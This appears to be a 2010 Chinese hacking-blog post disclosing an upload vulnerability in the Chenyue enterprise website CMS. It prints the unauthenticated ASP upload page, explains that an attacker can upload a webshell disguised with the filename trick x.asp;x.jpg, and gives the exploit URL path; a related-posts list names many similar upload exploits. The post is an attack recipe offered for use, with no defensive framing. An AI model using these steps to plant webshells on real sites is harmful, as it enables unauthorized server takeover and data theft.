尘月网络企业网站管理系统2010生成HTML专业版之上传漏洞

2010, April 12, 1:10 PM. 原创笔记
Submitted by admin

From:http://www.st999.cn/blog   久久久电脑工作室

http://forum.daokers.com/    刀客城

源码:

<%
lang=trim(request("case"))
%>
<html>
<head>
<meta http-equiv="Content-Language" content="zh-cn">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>上传页面</title>
</head>
<body topmargin="0" leftmargin="0" bgcolor="#D6E0EF">
<form method="POST" action="admin_upcl1.asp?case=<%=lang%>" name="form3" enctype="multipart/form-data">
                <input name="strPhoto" type="file" id="strPhoto" size="12">
  <input type="submit" value="上传预览图片" name="B1"></p>
</form>
</body>
</html>

没有验证用户,可以直接访问,上传格式为x.asp;x.jpg的大马就可以了。。。

只验证本版本,,没有对尘月其他系统版本进行测试。

利用语句:http://127.0.0.1:99/Admin_Cy/adm_uplo1.asp?case=pic1

 

Tags: 尘月, 上传

« 上一篇 | 下一篇 »

只显示10条记录相关文章
分享网络商城购物系统v3.0全功能版 上传漏洞 (浏览: 15348, 评论: 0)
upfile 又一奇迹般的突破 (浏览: 8328, 评论: 0)
无忧购物系统ASP通用版 V2010.9.17 ---- 上传漏洞 (浏览: 10158, 评论: 0)
无忧购物系统ASP时尚版上传漏洞 (浏览: 10086, 评论: 0)
深度学习asp整站系统oday (浏览: 8666, 评论: 0)
微尔文章系统v1.51 (修正版)上传漏洞 (浏览: 10682, 评论: 0)
Es_Cms上传漏洞利用 (浏览: 9475, 评论: 0)
良精微博系统上传漏洞 (浏览: 12714, 评论: 0)
一个上传文件的分析笔记 (浏览: 10562, 评论: 0)
上传漏洞hidden to text 突破手记 (浏览: 11181, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):